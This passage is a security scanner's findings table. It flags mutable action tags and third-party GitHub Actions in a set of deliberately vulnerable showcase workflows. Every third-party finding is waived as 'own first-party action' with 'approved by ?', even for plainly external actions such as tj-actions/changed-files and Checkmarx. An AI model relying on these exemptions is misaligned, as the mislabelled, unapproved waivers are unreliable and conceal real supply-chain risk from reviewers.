compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/trivy-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/setup-trivy
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: Checkmarx/kics-github-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/deploy.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: external-security-org/scanners/.github/workflows/sast.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/build.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/release.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/trivy-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: psf/black
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: tj-actions/changed-files
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: reviewdog/action-eslint
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: random-external-org/shared-workflows/.github/workflows/scan.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/12-reusable-workflow-trust.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: another-org/deploy-workflows/.github/workflows/deploy.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/12-reusable-workflow-trust.yml | Review the action's source code. Check its stars, maintainer, and update history. |